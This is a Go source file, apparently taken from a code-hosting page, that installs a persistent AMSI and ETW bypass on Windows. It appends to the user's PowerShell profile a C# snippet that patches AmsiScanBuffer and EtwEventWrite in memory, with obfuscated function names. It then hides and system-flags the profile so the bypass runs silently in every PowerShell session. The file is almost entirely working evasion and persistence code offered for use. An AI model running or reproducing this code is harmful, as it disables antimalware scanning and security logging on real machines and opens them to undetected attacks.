-
Notifications
You must be signed in to change notification settings - Fork 14
/
Copy pathPatcher.go
97 lines (82 loc) · 2.86 KB
/
Patcher.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
package main
import (
"os"
"os/exec"
"path/filepath"
"fmt"
)
func main() {
up, err := os.UserHomeDir()
if err != nil {
panic(err)
}
psprofpath := filepath.Join(up, "Documents", "WindowsPowerShell", "Microsoft.PowerShell_profile.ps1")
err = os.MkdirAll(filepath.Dir(psprofpath), os.ModePerm)
if err != nil {
panic(err)
}
file, err := os.OpenFile(psprofpath, os.O_APPEND|os.O_WRONLY|os.O_CREATE, os.ModePerm)
if err != nil {
panic(err)
}
defer file.Close()
pscript := `
$amsixetwpatch = @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public class Patcher
{
[DllImport("kernel32.dll")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
public static bool PatchAmsi()
{
IntPtr h = GetModuleHandle("a" + "m" + "s" + "i" + ".dll");
if (h == IntPtr.Zero) return false;
IntPtr a = GetProcAddress(h, "A" + "m" + "s" + "i" + "S" + "c" + "a" + "n" + "B" + "u" + "f" + "f" + "e" + "r");
if (a == IntPtr.Zero) return false;
UInt32 oldProtect;
if (!VirtualProtect(a, (UIntPtr)5, 0x40, out oldProtect)) return false;
byte[] patch = { 0x31, 0xC0, 0xC3 };
Marshal.Copy(patch, 0, a, patch.Length);
return VirtualProtect(a, (UIntPtr)5, oldProtect, out oldProtect);
}
public static void PatchEtwEventWrite()
{
const uint PAGE_EXECUTE_READWRITE = 0x40;
string ntdllModuleName = "ntdll.dll";
string etwEventWriteFunctionName = "EtwEventWrite";
IntPtr ntdllModuleHandle = GetModuleHandle(ntdllModuleName);
IntPtr etwEventWriteAddress = GetProcAddress(ntdllModuleHandle, etwEventWriteFunctionName);
byte[] retOpcode = { 0xC3 }; // RET opcode
uint oldProtect;
VirtualProtect(etwEventWriteAddress, (UIntPtr)retOpcode.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
int bytesWritten;
WriteProcessMemory(Process.GetCurrentProcess().Handle, etwEventWriteAddress, retOpcode, (uint)retOpcode.Length, out bytesWritten);
}
}
"@
Add-Type -TypeDefinition $amsixetwpatch -Language CSharp
[Patcher]::PatchAmsi()
[Patcher]::PatchEtwEventWrite()
cls
cls
`
_, err = file.WriteString(pscript + "\n")
if err != nil {
panic(err)
}
sigma := exec.Command("attrib", "+h", "+s", psprofpath)
err = sigma.Run()
if err != nil {
panic(err)
}
fmt.Println("Lifetime Amsi and ETW Bypass Applied.")
fmt.Scanln()
}